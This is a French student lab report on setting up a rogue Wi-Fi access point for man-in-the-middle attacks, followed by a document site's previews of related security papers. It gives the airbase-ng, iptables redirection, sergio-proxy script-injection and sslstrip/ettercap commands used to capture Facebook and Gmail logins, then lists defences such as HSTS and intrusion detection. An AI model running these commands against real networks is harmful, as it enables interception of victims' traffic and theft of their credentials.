Rogue AP NOUR SAADALLAH (RT3) SAFA FAKHFAKH (GL3) MEHER BEN SAID (GL3) SALMA SGHAIER (RT3) NABIL MEKNI (GL3)
|
|
- Francis Meloche
- il y a 8 ans
- Total affichages :
Transcription
1 Rogue AP NOUR SAADALLAH (RT3) SAFA FAKHFAKH (GL3) MEHER BEN SAID (GL3) SALMA SGHAIER (RT3) NABIL MEKNI (GL3)
2 Table des matières I.Présentation de l atelier Définition Architecture générale du réseau...2 II.Les outils utilisés kali Linux: Airmon-ng Airbase-ng Sergio-Proxy IPtables SSLsrtip Ettercap...6 III.Topologie du réseau Structure réseau : Principe de fonctionnement :...8 IV.Configuration des outils et tests Création de la Rogue AP Injection du code : redirection des pages web de la machine cible vers une page: sslstrip : a. test 1 : Pour un compte facebook : b. test 2 : Pour un compte gmail: V.Les solutions contre cette attaque: VI.Conclusion
3 I.Présentation de l atelier 1. Définition Un rogue access point est un point d accès sans fils non autorisé qui a été créé afin de permettre à un hacker de procéder à une attaque du type man-in-the-middle. Pour les victimes qui sont connectées au rogue AP, ce dernier peut paraître comme un point d accès régulier puisqu il peut assurer un accès fluide et transparent à internet. Mais il permet de réaliser plusieurs attaques : Récupération de trafic, redirection vers des sites (potentiellement malicieux), injection de code (scripts ) ou de virus(/trojans/malwares). 2. Architecture générale du réseau Un rogue AP peut être installé sur un réseau d entreprise sécurisé (par une personne ayant accès aux locaux de l entreprise) afin de permettre l accès à ce réseau à des partis non autorisés. L architecture est donc la suivante : 2
4 Dans notre cas, on va utiliser le rogue AP sur un petit réseau et un nombre de victimes limités (en étant MITM) : Tout le trafic généré par les victimes sera visible sur notre machine et on pourra ainsi récupérer toutes sortes de données! 3
5 II. Les outils utilisés Différents outils ont été utilisés pour configurer une rogue AP : 1.kali Linux: Kali Linux est une distribution Linux de tests d intrusion et d audit de Sécurité informatique très avancée qui suit complètement les normes et standards de développement de Debian. Cette distribution Linux est installable comme la plupart des distributions sur une clé USB bootable, une image ISO ou sur une machine virtuelle de type Virtual Box pour tester la configuration sous un environnement virtuel ou un serveur. Kali Linux offre près de 300 outils nécessaires aux tests de sécurité d un système d information afin de permettre au professionnel de la sécurité et aux entreprises de tester la robustesse de leur système et de leurs réseaux. Par exemple, il est capable de cracker des clés WEP/WPA. Pour finir, la distribution fonctionne maintenant sur des architectures ARM comme les Chromebooks, le Raspberry Pi. 4
6 2.Airmon-ng Airmon-ng est un petit script qui permettra de passer la carte wifi en mode dit «monitor» Concrètement ça signifie qu elle va être utilisée pour «observer» tout le trafic réseau environnant, et non pour discuter avec l un d eux. 3.Airbase-ng Airbase-ng est un outil de la suite aircrack-ng permettant de réaliser certaines attaques en créant de faux points d'accès wifi (fake AP) via une carte réseau wi-fi. Cela ouvre l accès à une multitude de techniques permettant de récupérer soit la clé WEP (Wired Equivalent Privacy) du réseau légitime, soit WPA (Wi-Fi Protected Access), et même WPA2, mais également de voler les cookies de la victime utilisant le réseau. 4. Sergio-Proxy Sergio-proxy est un proxy HTTP transparent multi-thread qui manipule le trafic Web, il a été créé pour faire face à certaines lacunes des filtres Ettercap lors de la modification du trafic HTTP. Sergio Proxy a un certain nombre de plugins utiles qui permettent de configurer l'attaque MITM, injecter des données arbitraires dans la session, lancer des attaques de navigateurs depuis Metasploit, et dynamiquement remplacer les fichiers avec les versions malveillantes. L injection peut se faire sous 2 formes : soit un script javascript, soit un fichier HTML. 5. IPtables Iptables est un logiciel libre de l'espace utilisateur Linux.C'est la commande permettant de paramétrer le filtre Netfilter du noyau et donc de configurer son firewall. Netfilter est le module qui fournit au noyau Linux les fonctions de pare-feu, de partage de connexions internet (NAT) et d'historisation du trafic réseau, Il intercepte et manipule les paquets IP avant et après le routage. Iptables permet à un administrateur réseaux de configurer Netfilter en mode utilisateur et configure la gestion des paquets réseaux IPv4. 5
7 6. SSLsrtip Sslstrip est un logiciel développé en Python par Moxie Marlinspike qui permet de détourner du trafic sécurisé https en le redirigeant vers du http en donnant l'illusion à la victime qu'elle est bien sur une connexion sécurisée et en gardant en mémoire tout ce qui a changé en créant une map (carte). Résultat: -le serveur ne voit rien, pour lui la connexion est toujours encryptée -le client ne voit aucun message d'alerte dans son navigateur -l'attaquant peut sniffer toutes les données car elles transitent en clair Sslstrip va donc falsifier les réponses aux requêtes favicon (une favicon est la petite image située à gauche de la barre d'adresse du navigateur) du navigateur, et afficher en guise de favicon un petit cadenas, comme celui ci: 7.Ettercap Ettercap est un logiciel libre d'analyse du réseau informatique. Il est capable de: -Intercepter le trafic sur un segment réseau. -Infecter, remplacer et supprimer des données dans une connexion. -Fournir aux victimes de faux certificats SSL dans des sessions HTTPS. -Capturer les mots de passe. -Réaliser des attaques dites de l'homme du milieu (Man In The Middle) contre un certain nombre de protocoles de communication usuels tels que HTTP, FTP et certains protocoles chiffrés. 6
8 III. Topologie du réseau 1. Structure réseau : On distingue 2 types de rogue AP : Un faux point d accès installé sur un réseau sécurisé de l entreprise sans aucune autorisation de la part de l administrateur du réseau local : ce rogue AP menace les grandes organisations avec un nombre important d employés, car n importe quelle personne ayant un accès aux locaux de l entreprise peut installer ( avec ou sans mauvaise intention) un routeur wifi peu couteux qui peut permettre à des parties non autorisés d accéder à des zones sécurisées du réseau. Un faux point d accès crée pour permettre au pirate d effectuer une attaque man in the middle : ce rogue AP cible les réseaux qui n utilisent pas une authentification mutuelle (client-serveur, serveur-client). Nous avons choisi de travailler avec le 2eme type ( man in the middle). 7
9 2. Principe de fonctionnement : La machine victime se connecte sur le faux point d accès. Le trafic internet de cette dernière est routé à travers le hacker. Une fois obtenu, le pirate le manipule et le bloque en utilisant sslstrip ce qui lui permettra de forcer la victime à utiliser http et par conséquent, il pourra capturer les noms d utilisateurs et les mots de passe que la victime saisit. Une fois sslstrip termine la manipulation el le blocage de trafic internet des victimes, le hacker redirigera ce dernier vers le routeur qui à son tour le redirigera vers le site web demandé. En gros, le hacker se place entre la victime et le site web, ce qui lui permet d intercepter les interactions entre ces derniers. 8
10 IV. Configuration des outils et tests Vous utilisez surement une machine qui dispose de deux interfaces réseau : -une interface sans-fil (wlan0) : pour le partage de connexion. -une interface filaire (eth0): connectée à Internet. Pour le partage de réseau: -On aura besoin d'un réseau wifi. -On fera appel à un serveur DHCP pour attribuer des adresses IP aux clients (ainsi que les infos passerelle et DNS) -On configurera la machine de façon à autoriser le transfert du trafic d une interface à l autre. 1. Création de la Rogue AP a. Création d'un réseau wifi ("WIFI gratuit" qui sera visible à la victime en utilisant les commandes) : airmon-ng start $ROGUE_IFACE : permet d'activer/désactiver le mode moniteur d'une carte wifi. Dans ce mode la carte wifi, se place en «observateur» du réseau. airbase-ng -c 3 -e 'WIFI gratuit' mon0 : cette commande est destinée à l'attaque de clients elle permet à la machine de se comporter comme un point d'accès complet. --> Ces 2 commandes sont de l'outil Aircrack-ng qui est en fait un logiciel spécialement conçu pour tester la sécurité d'un réseau Wifi. Il met à la disposition de l'utilisateur toute une panoplie d'outils permettant de réaliser efficacement ce genre de besogne. 9
11 b. Partage du réseau internet reçu par l'interface "NET_IFACE" à travers l'interface "ROGUE_IFACE" (activer le serveur DHCP) Vous allez remarquer qu'on a regroupé les commandes à utiliser dans le script "partie1", c'est juste pour faciliter l'exécution de celles ci. La commande iptables -t nat c est pour consulter la table nat contenant des paquets qui créent une nouvelle connexion, -A POSTROUTING pour ajouter l'option postrouting qui permet de modifier les paquets sortants, -o wlan0 l'interface de sortie, -j MASQUERADE : l'action à faire qui dans notre cas est le natting (qui permet aux machines avec des adresses privées de communiquer via internet) 10
12 La machine victime s est connectée sur notre réseau : 2. Injection du code : Le principal intérêt d un faux point d'accès, c est de se retrouver naturellement en mode «Man In The Middle» : se situer entre la cible et le reste du réseau ainsi tout le trafic passe par notre machine. C'est dans ce cadre qu'on introduit le Sergio-Proxy qui, entre récupération du trafic et modification «en live» de celui-ci, permet plusieurs scénarios d'attaques. Pour activer le sergio-proxy sur notre machine: cd /pentest/web/ wget 3- tar -xf sergio-proxy-v0.2.1.tar.gz rm sergio-proxy-v0.2.1.tar.gz Le programme est désormais disponible dans le dossier /pentest/web/sergio-proxy. Il faut se placer dans ce dossier avant de lancer l outil et le rendre exécutable : cd /pentest/web/sergio-proxy/ 11
13 chmod +x sergio-proxy.py./sergio-proxy.py help Pour que le trafic de la cible soit détourné vers sergio-proxy on va rediriger le port 80 (http) vers le port (par défaut pour sergio-proxy): iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to :10000 ici la commande iptables va altérer les paquets (dont le protocole de transport est tcp et le port est 80) dès leurs réception et les renvoie à la destination sur le port pour que sergio-proxy stocke tout ce qu il récupère dans un fichier texte on utilise la commande suivante : cd /pentest/web/sergio-proxy/ chmod +x sergio-proxy.p./sergio-proxy.py -l w /tmp/log.txt Voici maintenant quelques attaques qu'on peut effectuer sur la machine de la cible : 1-Retourner toutes les images de tous les sites (http) que la cible va visiter: (cette attaque ne se base pas sur une injection de code ). 12
14 Remarque: Avant de commencer l'injection silencieuse du code dans les pages web visitées par la cible, il faut activer le serveur web sur notre machine par la commande: /etc/init.d/apache2 start. 2- injection du code "Souriez, vous êtes piratés" dans une popup (moyennant le javascript ):./sergio-proxy.py -l w /tmp/sergio-log.txt --inject --html-payload "<script>alert(\"souriez, vous êtes piratés :-)\"):</script>" 3- injection du code "T'as un antivirus et t'es piraté, allo quoi" dans une popup( moyennant un fichier HTML ) : - Placer dans un fichier HTML /var/www/popup.js le code suivant : settimeout(function() { alert("t'as un antivirus et t'es piraté, allo quoi!") },5000); - Executer la commande :./sergio-proxy.py -l w /tmp/sergio-log.txt --inject --js-url --rate-limit 10 --match-str "</head>" 13
15 3. redirection des pages web de la machine cible vers une page: - Placer dans un fichier HTML /var/www/redirect.js le code suivant : window.settimeout(function(){ <! window.location = " //--> },3000); - Executer la commande :./sergio-proxy.py -l w /tmp/sergio-log.txt --inject --js-url --rate-limit 10 --per-domain" 14
16 4. SSLStrip : Pour intercepter les données personnelles de la machine cible telles que les logins et les mots de passe il suffit de taper la commande : Sslstrip f p k Ainsi on peut trouver ces données dans le fichier sslstrip.log: cat sslstrip.log (dans un nouveau terminal) 15
17 a. test 1 : Pour un compte facebook : Pour afficher ces données en temps réel on utilise la commande : ettercap -p -u -T -q -i at0( dans un nouveau terminal) // il manque ici le résultat sur le terminal 16
18 b. test 2 : Pour un compte gmail: Affichage des donnés en temps réel : Le contenu de fichier de trace «sslstrip.log» : 17
19 Remarque : SSLStrip devrait marcher sur tous les navigateurs. Cette attaque échouera avec les navigateurs Firefox et chrome pour les sites protégés avec HSTS (comme par exemple google.com et facebook.com).internet Explorer n'est pas conforme avec la norme RFC-6797 qui décrit la mesure de sécurité HSTS ce qui le rend plus susceptible aux attaques similaires à SSLStrip. Le protocole HSTS (HTTP Strict Transport Security),qui permet de renforcer la sécurité en ligne, n'est pas encore utilisé en masse. Ce mécanisme permettrait de renforcer la sécurité des sites visités, et des comptes qui y sont associés et ce en permettant les serveurs web de déclarer aux navigateurs web clients que l'interaction ne sera faite que via le protocole HTTPS. Notamment, dans le cas de réseaux Wi-Fi non fiables ou de connexions manquant de cryptage. Actuellement (2010), le protocole est en cours de standardisation par le IETF (Internet Engineering Task Force) et deux navigateurs très populaires le prennent déjà en charge :Il s'agit de Chrome et de FireFox (Microsoft n'a toujours pas implémenté le protocole HSTS). V.Les solutions contre cette attaque: L attaque Man In The Middle illustre la plus grande faille d une connexion en https. Cette attaque ne fonctionne pas sur tous les réseaux. Les réseaux les mieux protégés possèdent en effet des défenses permettant de contrer l arppoisoning. Il faut savoir que de plus en plus de sites proposent une navigation totalement en https dès la page d accueil. Les concepteurs de ces sites ont bien compris que le protocole SSL était sensible aux attaques Man In The Middle. Si la navigation est chiffrée du début à la fin il sera impossible de déchiffrer les données même si celles-ci sont interceptées. Il faudrait une puissance de calcul énorme pour réaliser cet exploit qu une personne seule ne peut pas posséder. Donc au niveau de l utilisateur il est souhaitable que celui-ci ouvre la page d accueil directement en https au lieu d http. Cependant lorsqu on n est pas certain du réseau sur lequel on est connecté, la meilleure façon de se protéger est de rester vigilant en évitant de s authentifier sur des sites sensibles lorsque ceux-ci ne proposent pas une navigation sécurisée dès la page d accueil. Idéalement les règles à respecter sont : de vérifier que la barre d adresses soit bien en https lorsque la navigation devrait se faire en SSL. de regarder le certificat du site web afin de voir dans un premier temps sa présence puis dans un second temps qu il est correctement signé. 18
20 d éviter d acheter sur des sites étrangers car la législation qui s y applique en cas de problème n est pas celle de la France. Le consommateur peut se retrouver piégé en cas de problème. de vérifier les coordonnées du cybercommerçant lors d un achat car la loi Française oblige ceuxci des les communiquer sur leur site. En cas d absence d adresse ou présence d adresse étrangère, il faut se méfier. On peut également se protéger contre ce type d'attaques grâce aux IPS IDS (Intrusion Detection System): C'est un mécanisme écoutant le trafic réseau de manière furtive afin de repérer des activités anormales ou suspectes et permettant ainsi d'avoir une action de prévention sur les risques d'intrusion. Ces règles ne sont pas exhaustives et peuvent en plus évoluer au cours du temps car la sécurité évolue toujours très vite. VI. Conclusion On a vu à quel point il est relativement simple de créer un rogue AP même si les attaques réalisées grâce à ce dernier sont très puissantes et dangereuses. Et c'est pourquoi il faut avoir conscience de la notion de "sécurité informatique" dans un monde où tout est connecté et prendre les mesures nécessaires contre les éventuelles attaques. «La sécurité est un compromis avant tout. Étant donné Que l on doit laisser passer des flux, on laisse automatiquement passer des attaques.» 19
Proxy et reverse proxy. Serveurs mandataires et relais inverses
Serveurs mandataires et relais inverses Qu'est-ce qu'un proxy? Proxy = mandataire (traduction) Un proxy est un service mandataire pour une application donnée. C'est à dire qu'il sert d'intermédiaire dans
Plus en détailSécurité des réseaux Firewalls
Sécurité des réseaux Firewalls A. Guermouche A. Guermouche Cours 1 : Firewalls 1 Plan 1. Firewall? 2. DMZ 3. Proxy 4. Logiciels de filtrage de paquets 5. Ipfwadm 6. Ipchains 7. Iptables 8. Iptables et
Plus en détailRéalisation d un portail captif d accès authentifié à Internet 10.10.10.1
Master 1 ère année UE Réseaux avancés I Projet Réalisation d un portail captif d accès authentifié à Internet Présentation du projet Le but du projet est de mettre en place un portail captif permettant
Plus en détailVoIP Sniffing IHSEN BEN SALAH (GL 3) MAHMOUD MAHDI (GL 3) MARIEM JBELI (RT 2) SAFA GALLAH (RT 3) SALAH KHEMIRI (RT 3) YOUSSEF BEN DHIAF (GL 3)
VoIP Sniffing IHSEN BEN SALAH (GL 3) MAHMOUD MAHDI (GL 3) MARIEM JBELI (RT 2) SAFA GALLAH (RT 3) SALAH KHEMIRI (RT 3) YOUSSEF BEN DHIAF (GL 3) Table des matières: 1. Présentation de l atelier... 2 2. Présentation
Plus en détailBut de cette présentation. Proxy filtrant avec Squid et SquidGuard. Serveur proxy. Serveur proxy. Hainaut P. 2013 - www.coursonline.
Proxy filtrant avec Squid et SquidGuard But de cette présentation Présenter le serveur proxy, son utilité et sa mise en œuvre Ce type de serveur est très utilisé en entreprise Il est donc important d en
Plus en détailVirtual Private Network WAFA GHARBI (RT4) CYRINE MAATOUG (RT4) BOCHRA DARGHOUTH (RT4) SALAH KHEMIRI (RT4) MARWA CHAIEB (RT3) WIEM BADREDDINE (RT3)
Virtual Private Network WAFA GHARBI (RT4) CYRINE MAATOUG (RT4) BOCHRA DARGHOUTH (RT4) SALAH KHEMIRI (RT4) MARWA CHAIEB (RT3) WIEM BADREDDINE (RT3) Table des matières 1. Présentation de l atelier 2 1.1.
Plus en détailAlexis Lechervy Université de Caen. M1 Informatique. Réseaux. Filtrage. Bureau S3-203 mailto://alexis.lechervy@unicaen.fr
M1 Informatique Réseaux Filtrage Bureau S3-203 mailto://alexis.lechervy@unicaen.fr Sécurité - introduction Au départ, très peu de sécurité dans les accès réseaux (mots de passe, voyageant en clair) Avec
Plus en détailNotions de sécurités en informatique
Notions de sécurités en informatique Bonjour à tous, voici un article, vous proposant les bases de la sécurité informatique. La sécurité informatique : Vaste sujet, car en matière de sécurité informatique
Plus en détail2. MAQUETTAGE DES SOLUTIONS CONSTRUCTIVES. 2.2 Architecture fonctionnelle d un système communicant. http://robert.cireddu.free.
2. MAQUETTAGE DES SOLUTIONS CONSTRUCTIVES 2.2 Architecture fonctionnelle d un système communicant Page:1/11 http://robert.cireddu.free.fr/sin LES DÉFENSES Objectifs du COURS : Ce cours traitera essentiellement
Plus en détailProtection des protocoles www.ofppt.info
ROYAUME DU MAROC Office de la Formation Professionnelle et de la Promotion du Travail Protection des protocoles DIRECTION RECHERCHE ET INGENIERIE DE FORMATION SECTEUR NTIC Sommaire 1. Introduction... 2
Plus en détailTP Linux : Firewall. Conditions de réalisation : travail en binôme. Fonctionnement du parefeu Netfilter. I Qu est ce qu'un firewall?
TP Linux : Firewall Objectif : Réaliser un firewall simple par filtrage de paquet avec iptables sous Linux Matériel : 1 serveur Linux S configuré en routeur entre le réseau du lycée qui représentera le
Plus en détailCharte d installation des réseaux sans-fils à l INSA de Lyon
Charte d installation des réseaux sans-fils à l INSA de Lyon Toute installation d un point d accès est soumise à autorisation auprès du Responsable Sécurité des Systèmes d Information (RSSI) de l INSA
Plus en détailSécuriser les achats en ligne par Carte d achat
Projet Sécurité Date : 09/02/09 Version : V 1.0 Etat : travail / vérifié / validé Rédacteur : JBO Réf. : CNRS/DSI/Expertise/ sécuriser la carte achat-v1.doc Annexes : Sécuriser les achats en ligne par
Plus en détailLINUX - Sécurité. Déroulé de l'action. - 3 jours - Contenu de formation
Objectif : Tout administrateur système et réseau souhaitant avoir une vision d'ensemble des problèmes de sécurité informatique et des solutions existantes dans l'environnement Linux. Prérequis : Connaissance
Plus en détailL'écoute des conversations VoIP
L'écoute des conversations VoIP Marc-André Meloche (OSCP, C EH, Security+) et Eric Gingras 5 à 7 Technique 21 Septembre 2010 Gardien Virtuel Entreprise de services-conseils spécialisée dans la sécurité
Plus en détailcedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007
F i r e w a l l s e t a u t r e s é l é m e n t s d ' a r c h i t e c t u r e d e s é c u r i t é cedric.foll@(education.gouv.fr laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL
Plus en détailFormation Iptables : Correction TP
Table des matières 1.Opérations sur une seule chaîne et sur la table filter:...2 2.Opérations sur plusieurs chaînes et sur la table filter:...5 3.Opérations sur plusieurs chaires et sur plusieurs tables
Plus en détailSECURIDAY 2013 Cyber War
Club de la Sécurité Informatique à l INSAT Dans le cadre de la 3ème édition de la journée nationale de la sécurité informatique SECURIDAY 2013 Cyber War SECURINETS Présente Formateurs: 1. Trabelsi NAJET
Plus en détailFirewall IDS Architecture. Assurer le contrôle des connexions au. nicolas.hernandez@univ-nantes.fr Sécurité 1
Sécurité Firewall IDS Architecture sécurisée d un réseau Assurer le contrôle des connexions au réseau nicolas.hernandez@univ-nantes.fr Sécurité 1 Sommaire général Mise en oeuvre d une politique de sécurité
Plus en détailFACULTE DES SCIENCES ET TECHNIQUES FES SAIS MASTER SYSTEMES INTELLIGENTS ET RESEAUX MST SIR 2014 TP WIFI. Encadré par PR.
FACULTE DES SCIENCES ET TECHNIQUES FES SAIS MASTER SYSTEMES INTELLIGENTS ET RESEAUX MST SIR 2014 TP WIFI Encadré par PR.AHLAM BEGEDOURI Abdelhamid El hassani Mohamed Ouddaf Nacer Harti Yahya kharban Hatim
Plus en détailpare - feu généralités et iptables
pare - feu généralités et iptables Cycle Ingénierie 3e année SRT Dernière mise à jour : 12/12/2006 Adrien URBAN pare-feu général routeurs pare-feu sans état pare-feu avec état pare-feu avec état et inspection
Plus en détailUn peu de vocabulaire
Un peu de vocabulaire Le SSID Service set identifier C est l identifiant de votre réseau. Votre réseau doit en principe porter un nom. Personnalisez-le. Attention si vous cochez «réseau masqué», il ne
Plus en détailUniversité Pierre Mendès France U.F.R. Sciences de l Homme et de la Société Master IC²A. TP réseau firewall
Université Pierre Mendès France U.F.R. Sciences de l Homme et de la Société Master IC²A TP réseau firewall L objectif de ce TP est de comprendre comment mettre en place un routeur pare-feu (firewall) entre
Plus en détailRouteur Chiffrant Navista Version 2.8.0. Et le protocole de chiffrement du Réseau Privé Virtuel Navista Tunneling System - NTS Version 3.1.
Routeur Chiffrant Navista Version 2.8.0 Et le protocole de chiffrement du Réseau Privé Virtuel Navista Tunneling System - NTS Version 3.1.0 Cibles de sécurité C.S.P.N Référence : NTS-310-CSPN-CIBLES-1.05
Plus en détailSQUID Configuration et administration d un proxy
SQUID Configuration et administration d un proxy L'objectif de ce TP est d'étudier la configuration d'un serveur mandataire (appelé "proxy" en anglais) ainsi que le filtrage des accès à travers l'outil
Plus en détailFigure 1a. Réseau intranet avec pare feu et NAT.
TD : Sécurité réseau avec Pare Feu, NAT et DMZ 1. Principes de fonctionnement de la sécurité réseau Historiquement, ni le réseau Internet, ni aucun des protocoles de la suite TCP/IP n était sécurisé. L
Plus en détailCe document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des tablettes ou smartphones.
PERSPECTIVES Le Single Sign-On mobile vers Microsoft Exchange avec OWA et ActiveSync Ce document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des
Plus en détailMONNIER Marie 10807915 2008/2009 WPA
WPA RESUME Je vais étudier dans ce projet WPA (WPA et WPA2, en particulier la version personal la plus utilisée, mais aussi la version enterprise utilisant un serveur d authentification de type radius
Plus en détailFILTRAGE de PAQUETS NetFilter
TP RESEAUX MMI Semestre 3 FILTRAGE de PAQUETS NetFilter OBJECTIF : Introduction à Netfilter. Configuration d'un firewall. MATERIELS : (Machines Virtuelles) 1 Serveur Debian avec apache d'installé, 1 Poste
Plus en détailProcédure d utilisation et de paramétrage (filtrage) avec IPFIRE
Procédure d utilisation et de paramétrage (filtrage) avec IPFIRE Par AVIGNON Bastien et CHOMILIER Tom V2.0 Sommaire : (Sommaire interactif) I) Introduction... 2 II) Mettre en place une black liste sur
Plus en détailTester la se curite de son re seau WiFi
Tester la se curite de son re seau WiFi Par Clément JOATHON Dernière mise à jour : 03/08/2015 Alors que pour s introduire sur un réseau filaire, il faut s y relier physiquement, en WiFi, toute personne
Plus en détailBut de cette présentation
Réseaux poste à poste ou égal à égal (peer to peer) sous Windows But de cette présentation Vous permettre de configurer un petit réseau domestique (ou de tpe), sans serveur dédié, sous Windows (c est prévu
Plus en détailSécurité des réseaux Les attaques
Sécurité des réseaux Les attaques A. Guermouche A. Guermouche Cours 2 : Les attaques 1 Plan 1. Les attaques? 2. Quelques cas concrets DNS : Failles & dangers 3. honeypot A. Guermouche Cours 2 : Les attaques
Plus en détailTAGREROUT Seyf Allah TMRIM
TAGREROUT Seyf Allah TMRIM Projet Isa server 2006 Installation et configuration d Isa d server 2006 : Installation d Isa Isa server 2006 Activation des Pings Ping NAT Redirection DNS Proxy (cache, visualisation
Plus en détailTech-Evenings Sécurité des applications Web Sébastien LEBRETON
Tech-Evenings Sécurité des applications Web Sébastien LEBRETON Pourquoi revoir la sécurité des applications Web Des technologies omniprésentes Facilité de mise en œuvre et de déploiement. Commerce en ligne,
Plus en détailRéseaux. Moyens de sécurisation. Plan. Evolutions topologiques des réseaux locaux
Réseaux Evolutions topologiques des réseaux locaux Plan Infrastructures d entreprises Routeurs et Firewall Topologie et DMZ Proxy VPN PPTP IPSEC VPN SSL Du concentrateur à la commutation Hubs et switchs
Plus en détailBibliographie. Gestion des risques
Sécurité des réseaux informatiques Bernard Cousin Université de Rennes 1 Sécurité des réseaux informatiques 1 Introduction Risques Attaques, services et mécanismes Les attaques Services de sécurité Mécanismes
Plus en détailRapport de certification ANSSI-CSPN-2011/14. Fonctionnalités de pare-feu de StoneGate Firewall/VPN 5.2.4 build 8069
PREM IE R M IN IS T R E Secrétariat général de la défense et de la sécurité nationale Agence nationale de la sécurité des systèmes d information Rapport de certification ANSSI-CSPN-2011/14 Fonctionnalités
Plus en détailLicence 3 Systèmes et Réseaux II. Chapitre V : Filtrage
Licence 3 Systèmes et Réseaux II Chapitre V : Filtrage Département IEM / UB Eric.Leclercq@u-bourgogne.fr Bureau G212 Aile des Sciences de l Ingénieur Mise-à-jour : février 2009 (Département IEM / UB) Filtrage
Plus en détailLes Protocoles de sécurité dans les réseaux WiFi. Ihsane MOUTAIB & Lamia ELOFIR FM05
Les Protocoles de sécurité dans les réseaux WiFi Ihsane MOUTAIB & Lamia ELOFIR FM05 PLAN Introduction Notions de sécurité Types d attaques Les solutions standards Les solutions temporaires La solution
Plus en détailL identité numérique. Risques, protection
L identité numérique Risques, protection Plan Communication sur l Internet Identités Traces Protection des informations Communication numérique Messages Chaque caractère d un message «texte» est codé sur
Plus en détailLe filtrage de niveau IP
2ème année 2008-2009 Le filtrage de niveau IP Novembre 2008 Objectifs Filtrage : Le filtrage permet de choisir un comportement à adopter vis à vis des différents paquets émis ou reçus par une station.
Plus en détailSécurité des réseaux sans fil
Sécurité des réseaux sans fil Matthieu Herrb CNRS-LAAS matthieu.herrb@laas.fr Septembre 2003 SIARS Toulouse 2003 Plan La technologie sans fils Faiblesses et Attaques Architecture Sécurisation des postes
Plus en détailLinux. Sécuriser un réseau. 3 e édition. l Admin. Cahiers. Bernard Boutherin Benoit Delaunay. Collection dirigée par Nat Makarévitch
Bernard Boutherin Benoit Delaunay Cahiers de l Admin Linux Sécuriser un réseau 3 e édition Collection dirigée par Nat Makarévitch Groupe Eyrolles, 2003, 2004, 2007, ISBN : 2-212-11960-7, ISBN 13 : 978-2-212-11960-2
Plus en détailSécurité GNU/Linux. Iptables : passerelle
Sécurité GNU/Linux Iptables : passerelle By sharevb Sommaire I.Rappels...1 a)les différents types de filtrages : les tables...1 b)fonctionnement de base : les chaînes et les règles...1 II.La table nat
Plus en détailPHISHING/PHARMING. Les Nouvelles Techniques qui portent atteinte à l intégrité des S.I
PHISHING/PHARMING Les Nouvelles Techniques qui portent atteinte à l intégrité des S.I Livre blanc réalisé par le Dr Patrice Guichard Le Phishing Si le «phishing» n est pas à proprement parlé une technique
Plus en détailBee Ware. Cible de Sécurité CSPN. Validation Fonctionnelle Validation Fonctionnelle Bon pour application AMOA BEEWARE BEEWARE
Référence : BNX_Cible-de-sécurité_CSPN Version : 1.3 Etat : A valider Date : Affaire/projet : Client : BEE WARE Classification : Diffusion projet Bee Ware i-suite Cible de Sécurité CSPN Validation Fonctionnelle
Plus en détailSécurité d IPv6. Sécurité d IPv6. Stéphane Bortzmeyer AFNIC bortzmeyer@nic.fr. Stéphane Bortzmeyer AFNIC bortzmeyer@nic.fr
Sécurité d IPv6 Stéphane Bortzmeyer AFNIC bortzmeyer@nic.fr 1 / 24 Sécurité d IPv6 Stéphane Bortzmeyer AFNIC bortzmeyer@nic.fr 2 / 24 Introduction IPv6 est la version d IP normalisée en 1995-1998 (RFC
Plus en détailLinux sécurité des réseaux
Linux sécurité des réseaux serveurs mandataires (proxy) fbongat@ipsl.jussieu.fr 2007-2008 Qu'est-ce qu'un proxy? = mandataire (traduction) Un proxy est un service mandataire pour une application donnée.
Plus en détailIntérêt du NAT (Network Address Translation) Administration Réseau Niveau routage. Exemple d Intranet. Principe NAT
Administration Réseau Niveau routage Intérêt du NAT (Network Address Translation) Possibilité d utilisation d adresses privées dans l 4 2 1 Transport Réseau Liaison Physique Protocole de Transport Frontière
Plus en détailVulnérabilités et sécurisation des applications Web
OSSIR 09/09/2002 Vulnérabilités, attaques et sécurisation des applications Web Pourquoi les firewalls sont impuissants patrick.chambet@edelweb.fr http://www.edelweb.fr http://www.chambet.com Page 1 Planning
Plus en détailPrésenté par : Mlle A.DIB
Présenté par : Mlle A.DIB 2 3 Demeure populaire Prend plus d ampleur Combinée avec le phishing 4 Extirper des informations à des personnes sans qu'elles ne s'en rendent compte Technique rencontrée dans
Plus en détailMISE EN PLACE DU FIREWALL SHOREWALL
MISE EN PLACE DU FIREWALL SHOREWALL I. LA MISSION Dans le TP précédent vous avez testé deux solutions de partage d une ligne ADSL de façon à offrir un accès internet à tous vos utilisateurs. Vous connaissez
Plus en détailProtection exhaustive de réseau corporate, optimisation de trafic Internet, administration flexible
Protection exhaustive de réseau corporate, optimisation de trafic Internet, administration flexible ÉVENTAIL DES UTILISATIONS Internet représente une part significative des affaires aujourd'hui. L'utilisation
Plus en détailSécurité et Firewall
TP de Réseaux IP pour DESS Sécurité et Firewall Auteurs: Congduc Pham (Université Lyon 1), Mathieu Goutelle (ENS Lyon), Faycal Bouhafs (INRIA) 1 Introduction: les architectures de sécurité, firewall Cette
Plus en détailInstaller une caméra de surveillance
Installer une caméra de surveillance 1. Spécifiez l'adresse IP de la caméra IP Pour installer une caméra de surveillance IP, il faut tout d'abord la connecter au routeur (ou à votre box ADSL) via le câble
Plus en détailWIFI sécurisé en entreprise (sur un Active Directory 2008)
Cette œuvre est mise à disposition selon les termes de la Licence Creative Commons Paternité - Pas d'utilisation Commerciale 3.0 non transposé. Le document est librement diffusable dans le contexte de
Plus en détailRapport de Projet. La sécurité du protocole 802.11 : l exploitation des failles et étude des méthodes de protection. Réalisé par :
Rapport de Projet La sécurité du protocole 802.11 : l exploitation des failles et étude des méthodes de protection Réalisé par : Abel ONDAS Albert MINKOMA Année Universitaire 2011-2012 SOMMAIRE INTRODUCTION...
Plus en détailSécurisation du réseau
Sécurisation du réseau La sécurisation du réseau d entreprise est également une étape primordiale à la sécurisation générale de votre infrastructure. Cette partie a pour but de présenter les fonctionnalités
Plus en détailUbuntu Linux Création, configuration et gestion d'un réseau local d'entreprise (3ième édition)
Introduction 1. Introduction 13 2. Le choix de l'ouvrage : Open Source et Linux Ubuntu 13 2.1 Structure du livre 13 2.2 Pré-requis ou niveau de connaissances préalables 13 3. L'objectif : la constitution
Plus en détailPACK SKeeper Multi = 1 SKeeper et des SKubes
